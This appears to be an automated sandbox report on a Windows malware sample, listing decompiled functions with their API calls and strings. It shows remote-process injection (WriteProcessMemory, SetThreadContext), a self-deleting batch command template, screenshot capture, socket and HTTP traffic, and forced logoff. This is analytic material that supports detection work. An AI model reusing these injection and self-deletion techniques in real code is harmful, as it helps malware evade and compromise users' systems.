Part of subcall function 001559C5: LeaveCriticalSection.KERNEL32(001827DC,00155A45,00000002,?,?,?,0014DAA2,00000002,00000001,000000FF), ref: 001559CF

Part of subcall function 001559D6: LeaveCriticalSection.KERNEL32(001827DC,?,0014D9F7,00000009,00C01E90,?,?,?,00151992,?,?,?,?,001648EB), ref: 001559E3

LeaveCriticalSection.KERNEL32(?,?,00000000,0000000B,?,?,?,?,00000004,0015D7B9,00000000), ref: 0015D774

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00175BA7, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 72

APIs

lstrcmpA.KERNEL32(?,?\C), ref: 00175BC4
lstrcpyW.KERNEL32(0017597D), ref: 00175BD6
lstrcmpA.KERNEL32(?,0014939C), ref: 00175BE9
StrCmpNA.SHLWAPI(?,00149394,00000002), ref: 00175BFF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00175C2A

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

Strings

?\C, xrefs: 00175BBC

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014C41C, Relevance: 9.1, APIs: 5, Instructions: 137

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014C44D

Part of subcall function 0016D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 0016D0B5

WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014C4DF

Part of subcall function 0014BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 0014C08A
Part of subcall function 0014BFFE: GetHandleInformation.KERNEL32(?,?), ref: 0014C09C
Part of subcall function 0014BFFE: socket.WS2_32(?,00000001,00000006), ref: 0014C0CF
Part of subcall function 0014BFFE: socket.WS2_32(?,00000002,00000011), ref: 0014C0E0
Part of subcall function 0014BFFE: closesocket.WS2_32(00000002), ref: 0014C0FF
Part of subcall function 0014BFFE: closesocket.WS2_32 ref: 0014C106
Part of subcall function 0014BFFE: memset.MSVCRT ref: 0014C1C8
Part of subcall function 0014BFFE: memcpy.MSVCRT ref: 0014C3C8

SetEvent.KERNEL32 ref: 0014C532
SetEvent.KERNEL32 ref: 0014C56B

Part of subcall function 0016D090: SetEvent.KERNEL32 ref: 0016D0A0

Part of subcall function 0014F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0014C5F0

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001653C3, Relevance: 9.1, APIs: 6, Instructions: 61

APIs

Part of subcall function 001648F2: GetModuleHandleW.KERNEL32 ref: 00164932
Part of subcall function 001648F2: WSAStartup.WS2_32(00000202,?), ref: 00164998
Part of subcall function 001648F2: CreateEventW.KERNEL32(00182974,00000001), ref: 001649BA
Part of subcall function 001648F2: GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 001649EC
Part of subcall function 001648F2: GetCurrentProcessId.KERNEL32 ref: 00164A17

SetErrorMode.KERNEL32(00008007), ref: 001653DC
GetCommandLineW.KERNEL32 ref: 001653E8
CommandLineToArgvW.SHELL32 ref: 001653EF
LocalFree.KERNEL32 ref: 0016542C
ExitProcess.KERNEL32(00000001), ref: 0016543D

Part of subcall function 00165087: CreateMutexW.KERNEL32(00182974,00000001,?), ref: 0016512D
Part of subcall function 00165087: GetLastError.KERNEL32(?,?,00000001,?,?,?,00165452), ref: 0016513D
Part of subcall function 00165087: CloseHandle.KERNEL32 ref: 0016514B
Part of subcall function 00165087: lstrlenW.KERNEL32(?), ref: 001651AD
Part of subcall function 00165087: ExitWindowsEx.USER32(00000014,80000000), ref: 001651DD
Part of subcall function 00165087: OpenEventW.KERNEL32(00000002,00000000,?), ref: 00165203
Part of subcall function 00165087: SetEvent.KERNEL32 ref: 00165210
Part of subcall function 00165087: CloseHandle.KERNEL32 ref: 00165217
Part of subcall function 00165087: CloseHandle.KERNEL32 ref: 00165229
Part of subcall function 00165087: IsWellKnownSid.ADVAPI32(00C01EC0,00000016), ref: 00165279
Part of subcall function 00165087: CreateEventW.KERNEL32(00182974,00000001,00000000,?), ref: 00165348
Part of subcall function 00165087: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00165361
Part of subcall function 00165087: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00165373
Part of subcall function 00165087: CloseHandle.KERNEL32(00000000), ref: 0016538A
Part of subcall function 00165087: CloseHandle.KERNEL32(?), ref: 00165390
Part of subcall function 00165087: CloseHandle.KERNEL32(?), ref: 00165396

Sleep.KERNEL32(000000FF), ref: 00165463

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016027E, Relevance: 9.0, APIs: 5, Instructions: 119

APIs

#8.OLEAUT32(?,?,00141618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00160301

Part of subcall function 00151BDD: #6.OLEAUT32 ref: 00151BE7
Part of subcall function 00151BDD: #2.OLEAUT32(ProhibitDTD), ref: 00151BF5

#6.OLEAUT32(00000000,?,00141618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00160350
#8.OLEAUT32(?), ref: 0016035B
#2.OLEAUT32(?), ref: 0016036D
#9.OLEAUT32(?), ref: 001603A4

Part of subcall function 001707B1: CoCreateInstance.OLE32(001417F8,00000000,00004401,00141858,?), ref: 001707C6

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159925, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 71

APIs

memcpy.MSVCRT ref: 0015993C

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

memcmp.MSVCRT ref: 0015995E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0015998C

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

lstrcmpiW.KERNEL32(?), ref: 001599DC

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 001599AD

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172B3C, Relevance: 9.0, APIs: 5, Instructions: 69

APIs

Part of subcall function 001727C1: socket.WS2_32(?,?,00000006), ref: 001727F5

connect.WS2_32(?,?), ref: 00172B7A
WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00172B89
WSASetLastError.WS2_32(?), ref: 00172BE7

Part of subcall function 00172968: shutdown.WS2_32(?,00000002), ref: 00172976
Part of subcall function 00172968: closesocket.WS2_32(?), ref: 0017297F
Part of subcall function 00172968: WSACloseEvent.WS2_32(?), ref: 00172992

Part of subcall function 00172917: WSACreateEvent.WS2_32(00000000,?,00172C15,?,00000000,?,00172CD1,?,?,?,?,00000000), ref: 0017292D
Part of subcall function 00172917: WSAEventSelect.WS2_32(?,?,00172CD1), ref: 00172943
Part of subcall function 00172917: WSACloseEvent.WS2_32(?), ref: 00172957

WSASetLastError.WS2_32 ref: 00172BA7
WSAGetLastError.WS2_32 ref: 00172BA9

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00151791, Relevance: 9.0, APIs: 5, Instructions: 66

APIs

InitializeCriticalSection.KERNEL32(00183510), ref: 001517B1

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

InitializeCriticalSection.KERNEL32 ref: 001517C6
memset.MSVCRT ref: 001517DB
TlsAlloc.KERNEL32(?,00000000,00164986,?,?,00000001), ref: 001517F2
GetModuleHandleW.KERNEL32(?), ref: 00151817

Part of subcall function 00158DB0: EnterCriticalSection.KERNEL32(00183510,00C01E90,00151829,?,00000000,00164986,?,?,00000001), ref: 00158DC0
Part of subcall function 00158DB0: LeaveCriticalSection.KERNEL32(00183510,?,00000000,00164986,?,?,00000001), ref: 00158DE8

Part of subcall function 00151857: TlsFree.KERNEL32(?), ref: 00151863
Part of subcall function 00151857: DeleteCriticalSection.KERNEL32(00C01E90,00000000,00151851,00C01E90,?,00000000,00164986,?,?,00000001), ref: 0015186A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00160799, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 001607CF

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

lstrcatW.KERNEL32(?,.dat), ref: 0016082F
lstrlenW.KERNEL32 ref: 00160844

Part of subcall function 00151AAE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00151ACA
Part of subcall function 00151AAE: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00151AED
Part of subcall function 00151AAE: CloseHandle.KERNEL32 ref: 00151AFA

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 001607F0
.dat, xrefs: 00160823

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001707DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

InternetSetOptionA.WININET(?,00000003,00146FA4,00000004), ref: 00170805

Part of subcall function 00166FD3: EnterCriticalSection.KERNEL32(00183510,?,00164693,?,001649A5,?,?,00000001), ref: 00166FE3
Part of subcall function 00166FD3: LeaveCriticalSection.KERNEL32(00183510,?,00164693,?,001649A5,?,?,00000001), ref: 00167009

GetAcceptLanguagesA.SHLWAPI ref: 0017084C
memcpy.MSVCRT ref: 00170886
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 001708BF

Strings

Accept-Language: , xrefs: 00170880

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014AD53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

Part of subcall function 00166FD3: EnterCriticalSection.KERNEL32(00183510,?,00164693,?,001649A5,?,?,00000001), ref: 00166FE3
Part of subcall function 00166FD3: LeaveCriticalSection.KERNEL32(00183510,?,00164693,?,001649A5,?,?,00000001), ref: 00167009

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0014ADA3
GetProcAddress.KERNEL32(?,GetProductInfo), ref: 0014ADB3
GetSystemDefaultUILanguage.KERNEL32(?,0014AA9B), ref: 0014ADEE

Strings

kernel32.dll, xrefs: 0014AD9E
GetProductInfo, xrefs: 0014ADAD

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00175D27, Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 81

APIs

GetTempPathW.KERNEL32(00000104), ref: 00175D3A
lstrcpyA.KERNEL32(?,0014939A,00000000,00175FC9,?,?,?,00175FC9,?,?,?,?,?,?,?,0015BD61), ref: 00175DD1
lstrcpynA.KERNEL32(?,?\C,00000003,?,0014939A,00000000,00175FC9,?,?,?,00175FC9,?), ref: 00175DE7

Strings

?\C, xrefs: 00175DDC

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014D2F7, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 77

APIs

VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 0014D315
VerQueryValueW.VERSION(?,?,?,?), ref: 0014D382

Part of subcall function 00173C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00173C98
Part of subcall function 00173C83: StrCmpIW.SHLWAPI(?,?), ref: 00173CA2

Strings

\VarFileInfo\Translation, xrefs: 0014D30A
\StringFileInfo\%04x%04x\%s, xrefs: 0014D357

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015332C, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 44

APIs

GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00153341
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0015334C

Part of subcall function 0015338D: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 001533AB
Part of subcall function 0015338D: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 001533B6
Part of subcall function 0015338D: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 001533C1
Part of subcall function 0015338D: lstrcmpiW.KERNEL32(?), ref: 0015344E
Part of subcall function 0015338D: memcpy.MSVCRT ref: 00153471
Part of subcall function 0015338D: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0015349C
Part of subcall function 0015338D: memcpy.MSVCRT ref: 001534CA

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 0015333A
GdipDisposeImage, xrefs: 00153343

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014CD5A, Relevance: 7.9, APIs: 5, Instructions: 109

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1), ref: 0014CD70
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1), ref: 0014CE9F

Part of subcall function 0014F0E1: memcmp.MSVCRT ref: 0014F0FD

memcpy.MSVCRT ref: 0014CDCD
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00153FA1,?,00000002), ref: 0014CDDD

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 0014CE11

Part of subcall function 0016D95F: GetSystemTime.KERNEL32(?), ref: 0016D969

Part of subcall function 0014EDAE: memcpy.MSVCRT ref: 0014EDF9

Part of subcall function 0014EEE2: memcpy.MSVCRT ref: 0014EFC1
Part of subcall function 0014EEE2: memcpy.MSVCRT ref: 0014EFE2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00166C9A, Relevance: 7.9, APIs: 5, Instructions: 252

APIs

memcmp.MSVCRT ref: 00166D07
memcpy.MSVCRT ref: 00166E14

Part of subcall function 00172B3C: connect.WS2_32(?,?), ref: 00172B7A
Part of subcall function 00172B3C: WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00172B89
Part of subcall function 00172B3C: WSASetLastError.WS2_32 ref: 00172BA7
Part of subcall function 00172B3C: WSAGetLastError.WS2_32 ref: 00172BA9
Part of subcall function 00172B3C: WSASetLastError.WS2_32(?), ref: 00172BE7

memcmp.MSVCRT ref: 00166F11

Part of subcall function 00172EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,0014FD6D,?,00000004,00007530,?,?,?,?), ref: 00172ED9
Part of subcall function 00172EA3: WSASetLastError.WS2_32(?), ref: 00172F21

Part of subcall function 00166A51: memcmp.MSVCRT ref: 00166A97

Part of subcall function 00165D47: memset.MSVCRT ref: 00165D57
Part of subcall function 00165D47: memcpy.MSVCRT ref: 00165D80

memset.MSVCRT ref: 00166F76
memcpy.MSVCRT ref: 00166F87

Part of subcall function 00165D97: memcpy.MSVCRT ref: 00165DA8

Part of subcall function 001669A2: memcmp.MSVCRT ref: 001669DE

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014D6C8, Relevance: 7.9, APIs: 5, Instructions: 86

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0014D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 0014D6D2
memcpy.MSVCRT ref: 0014D74E
memcpy.MSVCRT ref: 0014D762
memcpy.MSVCRT ref: 0014D78C
LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,0014D979,00000001,?,00000000,?,?,?,00000000), ref: 0014D7B2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155A4F, Relevance: 7.8, APIs: 4, Instructions: 27

APIs

GetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A51

Part of subcall function 00164B8D: WaitForSingleObject.KERNEL32(00000000,0015E1D7), ref: 00164B95

TlsGetValue.KERNEL32(?,?,0014B9B4), ref: 00155A6E
TlsSetValue.KERNEL32(00000001), ref: 00155A80
SetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A90

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016B562, Relevance: 7.8, APIs: 5, Instructions: 133

APIs

memset.MSVCRT ref: 0016B587
memcpy.MSVCRT ref: 0016B5E7
memcpy.MSVCRT ref: 0016B5FF

Part of subcall function 00149F94: memset.MSVCRT ref: 00149FA8

Part of subcall function 0015BD8C: memset.MSVCRT ref: 0015BE17

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 0016B66A
memcpy.MSVCRT ref: 0016B6A8

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156D60, Relevance: 7.8, APIs: 4, Instructions: 68

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00156D88
recv.WS2_32(?,?,00000400,00000000), ref: 00156DB4
send.WS2_32(?,?,?,00000000), ref: 00156DD6
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00156E03

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014C907, Relevance: 7.8, APIs: 4, Instructions: 66

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,0014CB5E,?), ref: 0014C961
LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,0014CB5E,?), ref: 0014C9C9

Part of subcall function 0014C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0014C404

Part of subcall function 00156A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?,?), ref: 00156A43
Part of subcall function 00156A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0016CB50,?,00000000,00000001,00000001,0016CB1A,?,001554E4,?,@echo off%sdel /F "%s",?), ref: 00156A56

InterlockedIncrement.KERNEL32 ref: 0014C99E
SetEvent.KERNEL32 ref: 0014C9BC

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155B40, Relevance: 7.7, APIs: 4, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(?,7C809F91,?,0014D091,?,?,00000000,0000EA60,00000000), ref: 00155B48
WaitForSingleObject.KERNEL32(?,00000000), ref: 00155B6C
CloseHandle.KERNEL32 ref: 00155B7C

Part of subcall function 001569C9: HeapAlloc.KERNEL32(00000000,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?,?,?), ref: 001569F3
Part of subcall function 001569C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?), ref: 00156A06

LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,0014D091,?,?,00000000,0000EA60,00000000), ref: 00155BAC

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00158459, Relevance: 7.7, APIs: 4, Instructions: 207

APIs

EnterCriticalSection.KERNEL32(00C027EC,3D920700), ref: 001584C0

Part of subcall function 001581D6: GetTickCount.KERNEL32 ref: 001581DE

LeaveCriticalSection.KERNEL32(00C027EC), ref: 0015869F

Part of subcall function 00158339: IsBadReadPtr.KERNEL32 ref: 00158405
Part of subcall function 00158339: IsBadReadPtr.KERNEL32 ref: 00158424

getservbyname.WS2_32(?,00000000), ref: 0015853A

Part of subcall function 00158A90: memcpy.MSVCRT ref: 00158C64
Part of subcall function 00158A90: memcpy.MSVCRT ref: 00158D64

Part of subcall function 00158770: memcpy.MSVCRT ref: 00158944
Part of subcall function 00158770: memcpy.MSVCRT ref: 00158A44

memcpy.MSVCRT ref: 00158619

Part of subcall function 00172471: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00182910,?,?), ref: 0017249E

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 00158162: TlsAlloc.KERNEL32(00C027EC,00158636,?,?,?,?,00C027E0,?), ref: 0015816B
Part of subcall function 00158162: TlsGetValue.KERNEL32(?,00000001,00C027EC), ref: 0015817D
Part of subcall function 00158162: TlsSetValue.KERNEL32(?,?), ref: 001581C2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155E12, Relevance: 7.7, APIs: 5, Instructions: 68

APIs

EnterCriticalSection.KERNEL32(00183510), ref: 00155E33
LeaveCriticalSection.KERNEL32(00183510), ref: 00155E59

Part of subcall function 00155DBC: InitializeCriticalSection.KERNEL32(00183648), ref: 00155DC1
Part of subcall function 00155DBC: memset.MSVCRT ref: 00155DD0

EnterCriticalSection.KERNEL32(00183648), ref: 00155E64
LeaveCriticalSection.KERNEL32(00183648), ref: 00155EDC

Part of subcall function 0014A509: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0014A54A
Part of subcall function 0014A509: PathRenameExtensionW.SHLWAPI(?,?), ref: 0014A59B

Part of subcall function 0014A5B2: memset.MSVCRT ref: 0014A757
Part of subcall function 0014A5B2: memcpy.MSVCRT ref: 0014A780
Part of subcall function 0014A5B2: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0014A885
Part of subcall function 0014A5B2: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0014A8A1

Sleep.KERNEL32(000007D0), ref: 00155ECF

Part of subcall function 0014A947: memset.MSVCRT ref: 0014A969

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015F7DB, Relevance: 7.7, APIs: 5, Instructions: 217

APIs

LoadLibraryW.KERNEL32(?), ref: 0015F838
GetProcAddress.KERNEL32(?,?), ref: 0015F860
StrChrA.SHLWAPI(?,00000040), ref: 0015F987

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

StrChrW.SHLWAPI(?,00000040,?,?), ref: 0015F968

Part of subcall function 0016C3E0: lstrlenW.KERNEL32(00147C5C), ref: 0016C3FC
Part of subcall function 0016C3E0: lstrlenW.KERNEL32(?), ref: 0016C402
Part of subcall function 0016C3E0: memcpy.MSVCRT ref: 0016C426

FreeLibrary.KERNEL32 ref: 0015FA6D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016CB99, Relevance: 7.7, APIs: 4, Instructions: 179

APIs

memcpy.MSVCRT ref: 0016CD50

Part of subcall function 0016CB99: memcpy.MSVCRT ref: 0016CBB0
Part of subcall function 0016CB99: CharLowerA.USER32 ref: 0016CC7B
Part of subcall function 0016CB99: CharLowerA.USER32(?), ref: 0016CC8B

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00151FF8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 173

APIs

Part of subcall function 00172DBA: WSAGetLastError.WS2_32 ref: 00172DF0
Part of subcall function 00172DBA: WSASetLastError.WS2_32(00002775), ref: 00172E54

memcmp.MSVCRT ref: 00152038
memcmp.MSVCRT ref: 00152050
memcpy.MSVCRT ref: 00152085

Part of subcall function 0016F70B: memcpy.MSVCRT ref: 0016F718

Part of subcall function 0016F8BA: memcpy.MSVCRT ref: 0016F8E7

Part of subcall function 0014FF1E: EnterCriticalSection.KERNEL32(?,?,00000002,?,?,00152175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 0014FF57
Part of subcall function 0014FF1E: LeaveCriticalSection.KERNEL32(0000002C,?,?,00000002,?,?,00152175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 0014FF7B

Part of subcall function 00151F85: GetTickCount.KERNEL32 ref: 00151F92

Part of subcall function 00172AB4: memset.MSVCRT ref: 00172AC9
Part of subcall function 00172AB4: getsockname.WS2_32(?,0014C22C,?), ref: 00172ADC

Part of subcall function 0017306E: memcmp.MSVCRT ref: 00173090

Part of subcall function 00166C9A: memcmp.MSVCRT ref: 00166D07
Part of subcall function 00166C9A: memcpy.MSVCRT ref: 00166E14
Part of subcall function 00166C9A: memcmp.MSVCRT ref: 00166F11
Part of subcall function 00166C9A: memset.MSVCRT ref: 00166F76
Part of subcall function 00166C9A: memcpy.MSVCRT ref: 00166F87

Strings

GET , xrefs: 00152032
POST , xrefs: 0015204A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001565F3, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 115

APIs

Part of subcall function 00155D25: memset.MSVCRT ref: 00155D35

lstrlenA.KERNEL32(?,?,?), ref: 001566BC
lstrlenA.KERNEL32(?), ref: 001566CF

Part of subcall function 0016CB99: memcpy.MSVCRT ref: 0016CBB0
Part of subcall function 0016CB99: CharLowerA.USER32 ref: 0016CC7B
Part of subcall function 0016CB99: CharLowerA.USER32(?), ref: 0016CC8B
Part of subcall function 0016CB99: memcpy.MSVCRT ref: 0016CD50

Part of subcall function 00156AE4: memcpy.MSVCRT ref: 00156AF7

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Strings

?*, xrefs: 001566B1
:, xrefs: 0015670A
:, xrefs: 00156731

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015D9E7, Relevance: 7.6, APIs: 5, Instructions: 101

APIs

Part of subcall function 00155A4F: GetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A51
Part of subcall function 00155A4F: TlsGetValue.KERNEL32(?,?,0014B9B4), ref: 00155A6E
Part of subcall function 00155A4F: TlsSetValue.KERNEL32(00000001), ref: 00155A80
Part of subcall function 00155A4F: SetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A90

GetProcessId.KERNEL32(?), ref: 0015DA83

Part of subcall function 0016BE5A: CreateMutexW.KERNEL32(00182974,00000001,?), ref: 0016BEA0
Part of subcall function 0016BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0016BEAC
Part of subcall function 0016BE5A: CloseHandle.KERNEL32 ref: 0016BEBA

Part of subcall function 0014FBD5: TlsGetValue.KERNEL32(?,?,0015D975), ref: 0014FBDE

Part of subcall function 00164A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164A89
Part of subcall function 00164A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164AC4
Part of subcall function 00164A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B04
Part of subcall function 00164A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B27
Part of subcall function 00164A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00164B77

GetThreadContext.KERNEL32 ref: 0015DAE5
SetThreadContext.KERNEL32(?,?), ref: 0015DB24
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0015DB3B
CloseHandle.KERNEL32(?), ref: 0015DB45

